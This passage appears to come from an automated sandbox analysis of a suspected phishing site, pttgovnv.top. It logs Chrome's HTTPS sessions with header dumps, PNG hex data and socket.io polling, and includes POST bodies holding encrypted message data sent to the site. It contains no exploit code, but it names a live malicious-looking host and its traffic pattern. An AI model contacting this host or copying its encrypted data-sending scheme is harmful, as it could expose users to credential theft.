          2024-09-01 22:25:24 UTC300OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 39 39 76 4b 4b 2f 76 6b 74 6b 4c 4c 44 49 70 34 78 32 52 4e 2b 6a 70 4c 4f 31 2f 59 53 69 70 63 58 31 4f 53 78 49 75 74 7a 4e 31 41 50 71 39 4a 34 6e 71 48 55 73 77 51 31 59 6a 65 6b 2b 70 35 65 5a 78 43 4a 6b 57 4d 7a 4d 34 59 62 53 70 62 4a 4a 77 63 4a 6b 75 34 44 52 38 55 4c 68 59 2b 4f 63 62 2b 6b 50 39 72 37 34 70 4e 48 78 49 65 47 62 58 57 67 56 41 6c 6c 37 67 2b 4a 35 46 4e 38 79 45 48 44 54 2b 4f 35 34 6f 6b 55 6f 70 4b 4d 52 57 2f 6e 4e 33 6f 48 63 37 30 38 49 62 46 43 75 6e 62 4c 6b 6d 49 6f 44 51 68 46 4d 54 48 2f 4c 6c 54 4d 49 4b 66 32 54 6e 73 57 65 67 6a 7a 37 4e 58 4a 6f 66 79 41 49 54 6a 58 54 56 75 69 34 6e 77 6a 78 57 59 53 69 32 69 62 4f 2f 4d 52 57 62 62 32 52 35 54 45 79 42 36 68 45 57 2b 6b 42 41 4e 51
          Data Ascii: U2FsdGVkX199vKK/vktkLLDIp4x2RN+jpLO1/YSipcX1OSxIutzN1APq9J4nqHUswQ1Yjek+p5eZxCJkWMzM4YbSpbJJwcJku4DR8ULhY+Ocb+kP9r74pNHxIeGbXWgVAll7g+J5FN8yEHDT+O54okUopKMRW/nN3oHc708IbFCunbLkmIoDQhFMTH/LlTMIKf2TnsWegjz7NXJofyAITjXTVui4nwjxWYSi2ibO/MRWbb2R5TEyB6hEW+kBANQ
          2024-09-01 22:25:24 UTC643INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: application/json; charset=utf-8
          Content-Length: 36
          Connection: close
          Access-Control-Allow-Origin: *
          ETag: W/"24-KVzS0QyW/RVPLyKTUjejnSs/2PA"
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmIDFxm5YvfijwC3J5dDWGCj7N6mmb6vsJ9bVriAmhGTQFVGJ2ngAubuf5cD3%2F34oFjCmYccYj0TnETWG%2FCR75PkmNPO5HYYIdqZKFL9z%2By18PC2CeXrTwnOSdT9mlQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0ece0b41e0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 39 37 63 2b 6f 69 4e 49 61 46 78 56 79 54 68 5a 34 69 54 52 43 76 41 55 63 3d
          Data Ascii: U2FsdGVkX197c+oiNIaFxVyThZ4iTRCvAUc=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          49192.168.2.449790172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLz4&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC571INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPzMOFIFBgbT%2BT7z8%2BphrJ4OmGQrZ0M215cWsxEfMtSzcIubK0yWBfUUR2QBTzQtsZ1ihFImdYwdAZ9ORIGek9gyrZKLt4BLns8pdhOw0qyV%2FF1Opvhl0UjYB7VDQfg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0eee737d00-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          50192.168.2.449791104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLHP&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC623INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 1
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TxaDOvsyLhme2kE%2B7%2Btwzf2onfy%2FAPtePVxKxsnogUtnEJm1VDrwmVNNLBvcy6pNrFciMDQztcbw%2BE%2FUCArzsWEXII1qluvfhIivLTFnDkLIu20KD3U3j6yiG6wyG4E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0ee89e4414-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC1INData Raw: 31
          Data Ascii: 1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          51192.168.2.449789172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC599OUTGET /help/layout/images/32.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC733INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: image/png
          Content-Length: 68762
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"10c9a-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36233
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OR%2BMlmpi2ws8WR8py%2BFRuEC8jw3E9o7yvgD3qhpW6589gPy0OG25jiIQUrNcEYneMqco%2FtoiBGU%2BH%2B4oVdWhaUzeB6Qt5IhvMYhVEEo%2FakAwDeMUZ7hqkFT6wwnr%2FF0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0f1dcf0f88-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC636INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 d0 00 00 03 66 08 06 00 00 00 31 1c e4 c4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
          Data Ascii: PNGIHDRf1tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
          2024-09-01 22:25:24 UTC1369INData Raw: 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 36 41 30 30 36 43 36 42 38 46 45 31 31 45 34 38 38 42 30 39 46 46 46 33 33 34 32 32 45 41 30 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 32 42 39 30 45 34 44 44 42 41 42 37 45 34 31 31 38 37 30 32 44 36 39 34 43 32 44 44 39 42 43 39 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 43 37 31 37 41 39 43 31 34 34 41 44 45 33 31 31 42 33 37 35 42 38 31 45 31 45 45 42 35 42 39 36 22 2f 3e 20 3c 2f 72 64 66
          Data Ascii: xmpMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf
          2024-09-01 22:25:24 UTC1369INData Raw: 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01
          Data Ascii: jMZSh5jMZSh5jMZSh5jMZSh5jMZSh5jMZS
          2024-09-01 22:25:24 UTC1369INData Raw: fc f9 db 79 c2 fc e8 3c f3 c4 6a 42 4d be ed 38 f4 60 eb 04 00 00 00 00 ec 13 5b 38 01 b0 4b d7 5f 7f 7d f4 f7 f7 47 47 47 47 7d ee f4 b6 ed b1 f5 a9 af 88 e1 3b 56 ef fa ef 3b 3b a2 f3 b4 13 aa 29 33 a5 34 73 f4 3d 3d 50 f6 52 d9 c6 a9 c5 a6 d0 14 0f ca 7c 23 b3 22 f3 f9 cc 9b 33 b7 39 9a 00 2d f0 8b ee fc 79 d1 55 b6 7d 5a 78 f2 c8 db 8e a3 0e b7 28 61 0b 27 00 00 00 00 b8 3b 26 d0 00 b0 4b 75 2c 58 f6 7f ea 2b bf 5b 9e 99 da 1b 5d f7 3e 2d ba ce bb 57 74 9d bb 30 3a 66 cf f2 e0 d8 9f 13 8e d6 9c 42 f3 c3 a8 b6 6f 7a 7c e6 05 99 63 32 6f c9 5c e1 88 02 34 f9 79 cc 92 e5 31 90 89 4b bf 3f f2 7e 99 48 d3 79 d6 49 d1 75 d6 89 d1 79 e6 49 d1 b9 e0 28 93 e3 00 00 00 00 80 3b 31 81 06 80 5d da b2 65 4b dc 78 e3 8d d1 dd 5d 8f ae e5 f0 d2 3b 62 eb d3 2e 8a e8
          Data Ascii: y<jBM8`[8K_}GGGG};V;;)34s==PR|#"39-yU}Zx(a';&Ku,X+[]>-Wt0:fBoz|c2o\4y1K?~HyIuyI(;1]eKx];b.
          2024-09-01 22:25:24 UTC1369INData Raw: b7 18 00 00 00 00 30 89 14 68 00 d8 67 53 a6 4c 89 d9 b3 67 c7 fa f5 eb a3 ab ab cb 82 70 e0 27 24 ad 37 85 a6 b8 38 f3 d8 cc 9f 4d e2 6d 98 ba 8b cf 7f 63 66 73 e6 fa cc 65 99 0d 51 4d aa f9 4d 66 99 47 1b 40 f3 19 28 53 68 fe fa 4f 2c 04 00 00 00 00 4c 22 05 1a 00 f6 fd 87 47 77 77 cc 9c 39 33 d6 ae 5d ab 40 c3 98 68 d1 29 34 65 fa cb db 32 f7 cd dc b3 89 6e d7 89 8d b7 67 67 1e 97 19 ca 6c 89 aa 54 f3 a3 a8 b6 7e 5a 14 d5 56 50 65 92 ce e2 b0 05 14 c0 a4 1a 54 a0 01 00 00 00 80 49 d7 31 3c ec b5 12 00 f6 cf 1d 77 dc 11 2b 57 ae 1c d9 d6 09 0e 54 29 cf f4 5d f8 a6 56 bb d9 53 32 2f cb bc ba 45 97 bd 6c f1 54 b6 80 5a 51 be a4 33 a5 c1 74 55 54 65 9b b2 05 d4 46 8f 4c 80 89 31 ed 53 6f 8c 8e 23 ee d1 32 b7 b7 3c 97 50 a6 12 9e 78 e2 89 0e 1e d0 2c ca 2f
          Data Ascii: 0hgSLgp'$78MmcfseQMMfG@(ShO,L"Gww93]@h)4e2ngglT~ZVPeTI1<w+WT)]VS2/ElTZQ3tUTeFL1So#2<Px,/
          2024-09-01 22:25:24 UTC1369INData Raw: 0b c2 01 69 e1 29 34 53 32 17 65 5e 96 31 8e 69 7c 0c 46 55 ac 29 57 e2 5e 17 d5 16 50 a5 64 73 53 e6 27 51 4d b1 d9 5a 1e 46 96 0a 68 ad df d2 3b 62 da 67 de 12 1d 73 67 b7 d6 37 e5 c1 c1 98 31 63 46 1c 73 cc 31 b6 f3 a4 2e 14 68 98 94 5f 91 32 eb 32 5f cf bc 2d aa e9 8c 2b 2c 0b 00 00 c0 d8 50 a0 01 60 5c 5c 7f fd f5 d1 df df af 44 c3 01 69 f1 29 34 47 66 2e ce 9c e7 48 4e b8 52 9e 29 63 ef 6f cf dc 98 b9 22 7e bb 2d d4 ca 30 fe 1e 68 72 bd cf 7b 52 74 3f f6 e1 2d 77 bb cb b9 5f 29 d0 cc 9e 3d db 41 a4 0e 14 68 68 06 e5 5c f7 e3 99 6b 33 df cd ac b7 24 00 00 00 fb 4f 81 06 80 71 b1 76 ed da 58 ba 74 69 74 76 1a be c1 81 69 e1 29 34 45 79 41 a5 3c a1 7d aa 23 39 a9 b6 45 35 fa be 94 67 ca 56 4f 8b 33 5f 8d aa 50 53 ae da 2d 5b 40 29 d5 00 4d a3 f3 ac 93
          Data Ascii: i)4S2e^1i|FU)W^PdsS'QMZFh;bgsg71cFs1.h_22_-+,P`\\Di)4Gf.HNR)co"~-0hr{Rt?-w_)=Ahh\k3$OqvXtitvi)4EyA<}#9E5gVO3_PS-[@)M
          2024-09-01 22:25:24 UTC1369INData Raw: d2 c3 a3 da 76 f4 53 99 e3 2d 07 00 00 d0 ce 14 68 00 98 bc 1f 42 9d 9d 71 ec b1 c7 2a d1 b0 cf 46 a7 d0 b4 91 32 81 e6 e5 99 3e 47 97 3d e8 88 6a db a7 f2 05 f0 8f 99 ff c8 7c 2b f3 b9 cc 47 32 2f ce dc 3b 33 bf f1 df 02 6d a0 d5 b7 71 2a 36 6e dc 18 fd fd fd 0e 26 40 6b 9a 96 79 62 54 25 ee 67 67 a6 5b 12 00 00 a0 1d 75 94 71 ca 00 30 99 06 06 06 62 f1 e2 c5 23 db 39 95 52 cd c8 0f a8 0e af fb 72 f7 ca 96 16 7d 17 be a9 ad ce cb a2 2a 3f bc 3e 33 11 fb 9a 95 d6 da f9 99 79 99 07 67 4e 6a 84 d6 b7 2c b3 3a f3 e5 cc 8d 99 9f 67 7e 95 d9 68 69 a0 45 75 77 c5 b4 2f fc bf e8 98 d9 ba af 57 96 f2 cc 82 05 0b 62 e6 cc 99 8e 27 ed 62 5e e3 67 ed 7d 2c 05 35 54 26 22 be a9 f1 35 00 00 00 d0 36 14 68 00 68 0a 43 43 43 b1 68 d1 a2 91 32 4d 29 cf f4 f5 f5 c5 ce 3f
          Data Ascii: vS-hBq*F2>G=j|+G2/;3mq*6n&@kybT%gg[uq0b#9Rr}*?>3ygNj,:g~hiEuw/Wb'b^g},5T&"56hhCCCh2M)?
          2024-09-01 22:25:24 UTC1369INData Raw: b3 52 a0 01 80 bd 54 ae 94 de bc 79 f3 8e d2 cc ba 75 eb ee 54 a8 29 3f 53 77 fe b9 6a 5a cd c4 ab c9 14 9a a2 14 52 fe 2e f3 82 a8 ca 28 e3 e5 a7 99 37 67 3e 39 86 ff 66 6f 66 4e e6 fe 8d 2c 6c bc 3d d4 23 b8 6d ad 89 aa 3c f3 f9 a8 b6 7a fa 49 e6 26 cb 02 fb 6f ca 45 cf 8a ae 87 dd bf e5 ef 47 39 6f 9a 37 6f 5e cc 9d 3b d7 41 a5 15 29 d0 c0 be 5b 19 d5 a4 cb 8f 59 8a a6 53 f6 54 2c 4f 76 78 b1 60 fc 75 34 52 94 7d c4 87 2c 49 d3 eb 69 bc 75 ac 26 d6 90 ef 49 00 4c ca c9 9a 02 0d 00 ec bf c1 c1 c1 1d 7f 5e be 7c 79 6c d9 b2 65 47 71 a6 fc b9 94 6e 46 0b 37 5d 5d 5d 16 6c 02 d4 64 0a cd a8 a7 64 2e ca 9c 30 8e 9f e3 86 cc c7 a3 da 3a 6a fb 38 fc fb a5 50 73 66 e6 0f a2 2a 03 9d 9b 29 e3 08 0e f2 68 6e cf 6f 9b 99 1f 65 ca 17 e9 15 99 6f 44 f5 42 ca 36 4b
          Data Ascii: RTyuT)?SwjZR.(7g>9fofN,l=#m<zI&oEG9o7o^;A)[YST,Ovx`u4R},Iiu&IL^|yleGqnF7]]]ldd.0:j8Psf*)hnoeoDB6K
          2024-09-01 22:25:24 UTC1369INData Raw: 84 13 4e d8 f1 e7 52 ac b9 ed b6 db 76 bc 5f 8a 35 1b 36 6c d8 31 95 a6 bc 20 55 a7 17 a5 6a 3a 85 66 d4 2f 32 ff 18 55 a9 e4 85 31 3e e5 91 f2 6f fe 4d e6 7e 99 57 46 55 dc d9 de 04 f7 bd 8c 80 ff 55 23 c5 eb 33 67 44 35 95 a6 8c c7 3e 26 4c a7 69 75 9d 8d e3 79 52 e3 fd 0b 32 d7 65 fe 3b aa ad 9e 96 37 c9 63 11 c6 d5 e0 0f 7e 1a d1 97 0f f5 29 ad df 0f 2c e7 27 9b 37 6f 8e b5 6b d7 c6 9c 39 73 1c 5c 80 fa 7a 55 54 db b5 be 28 94 a3 01 00 80 09 a6 40 03 00 6d a4 ab ab eb 4e db 3f 95 42 cd 9a 35 6b 76 94 66 36 6d da 34 f2 c2 54 f9 ef 8a 52 ac 69 e7 2d 9f 6a 3c 85 66 d4 1d 51 5d bd b9 38 f3 fc cc a9 e3 f4 79 4a 89 e1 5d 99 93 33 1f 68 7c de 66 b2 b8 91 e2 3f a2 2a cf fc 7e e6 c1 8d db bc 20 aa 2b 5d 69 5d 0b 1b f9 d3 a8 4a 63 df cd 7c 35 aa 6d 9e 6e b3 3c
          Data Ascii: NRv_56l1 Uj:f/2U1>oM~WFUU#3gD5>&LiuyR2e;7c~),'7ok9s\zUT(@mN?B5kvf6m4TRi-j<fQ]8yJ]3h|f?*~ +]i]Jc|5mn<
          2024-09-01 22:25:24 UTC1369INData Raw: 65 1e e4 e1 d5 92 4e 6d e4 71 99 9b 32 1f cb 5c 91 b9 c6 d2 d0 cc 06 2f bf 2a ba 1e b0 b0 6d ee 4f 39 67 d8 b0 61 43 6c db b6 6d a4 a8 0b 00 0d cf 8f aa 94 7f 91 a5 00 00 00 c6 9a 02 0d 00 30 ee a6 4e 9d 3a 92 51 65 3b a8 72 55 79 51 de de 7a eb ad 31 34 34 b4 e3 fd b2 6d c3 68 89 a6 bc 1d 2d de 1c a8 ae b3 4f 19 c9 e0 b5 4a 34 bb 50 ca 2c ff 98 b9 3e f3 b2 18 bf ab 0f cb d5 8d 2f c9 3c 22 f3 8e cc c5 d1 3e 57 db 2d 6b a4 6c 03 74 48 54 25 9a 73 33 7f 95 39 2a aa 12 11 ad a3 5c dd fc 7b 8d 6c 8c ea ca b7 2f 67 be 9d 59 63 79 68 36 83 df 6f af 6d 9c 8a 9e 9e 9e 91 2d 22 cb 44 bb c9 de 0a 12 80 a6 f2 ca cc d6 cc eb 2d 05 00 00 30 96 6c e1 04 00 4c b8 52 88 19 4d d9 96 a1 6c fb 54 b6 80 2a 29 d3 6a 06 07 07 47 4a 36 25 e5 ef b7 6c d9 32 52 ac 19 2d d9 1c c8
          Data Ascii: eNmq2\/*mO9gaClm0N:Qe;rUyQz144mh-OJ4P,>/<">W-kltHT%s39*\{l/gYcyh6om-"D-0lLRMlT*)jGJ6%l2R-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          52192.168.2.449792172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC671OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liL-i&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 619
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC619OUTData Raw: 34 32 31 5b 22 6d 65 73 73 61 67 65 22 2c 7b 22 6d 73 67 22 3a 7b 22 74 79 70 65 22 3a 22 55 32 46 73 64 47 56 6b 58 31 39 41 78 62 49 38 48 73 44 6d 57 32 74 71 46 4b 4d 39 6d 64 33 43 5a 47 67 58 22 2c 22 64 61 74 61 22 3a 22 55 32 46 73 64 47 56 6b 58 31 2f 51 7a 56 73 48 70 39 71 6b 42 64 6f 4d 54 31 49 34 30 66 76 61 37 5a 55 53 4d 6b 6e 64 67 32 6a 41 6f 75 4e 38 69 6e 4a 42 4c 52 33 62 72 39 7a 79 47 54 58 38 54 77 78 56 50 6b 69 59 43 34 65 47 4d 6a 47 69 64 71 41 50 34 6e 37 6b 69 66 46 56 75 61 31 58 36 56 65 59 5a 61 47 4b 6b 6e 32 52 65 4d 34 30 74 75 76 44 34 47 6f 43 6b 47 69 69 31 47 39 79 52 6f 32 46 36 56 51 34 36 4a 78 5a 4c 53 34 53 62 58 49 6b 63 58 79 4d 31 4f 49 47 70 73 4f 67 47 55 70 6f 49 66 6b 73 55 69 7a 32 54 7a 47 58 43 65 6f
          Data Ascii: 421["message",{"msg":{"type":"U2FsdGVkX19AxbI8HsDmW2tqFKM9md3CZGgX","data":"U2FsdGVkX1/QzVsHp9qkBdoMT1I40fva7ZUSMkndg2jAouN8inJBLR3br9zyGTX8TwxVPkiYC4eGMjGidqAP4n7kifFVua1X6VeYZaGKkn2ReM40tuvD4GoCkGii1G9yRo2F6VQ46JxZLS4SbXIkcXyM1OIGpsOgGUpoIfksUiz2TzGXCeo
          2024-09-01 22:25:24 UTC601INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqvrMYw2zL%2F0xEb6AxOdD7itofOu6C4TQYLT5MudGrpzAP8zGOZrzx4QeQRPE2oYgS89e26HIxFWocy3JoBhCM8aEywJ83sKFB9graJ9UQxoHEceghCBpy015%2FIPbv4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad101a5f8c81-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          53192.168.2.449793172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liM2q&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 1
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC1OUTData Raw: 31
          Data Ascii: 1
          2024-09-01 22:25:24 UTC609INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BwTb%2BTW13CWYR5CSJIWER%2BVZE3jukOsfza5%2FgfqieR1VsRm6ABHjCYjoOs%2FqppiPeSpHLq%2FZ71tnBDMw3vhuvkI2YI7aE6Pv83ySeKwxtZ6ZYBXDCd0jvPb6JDUdLw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad112b2e7ca0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          54192.168.2.449794104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
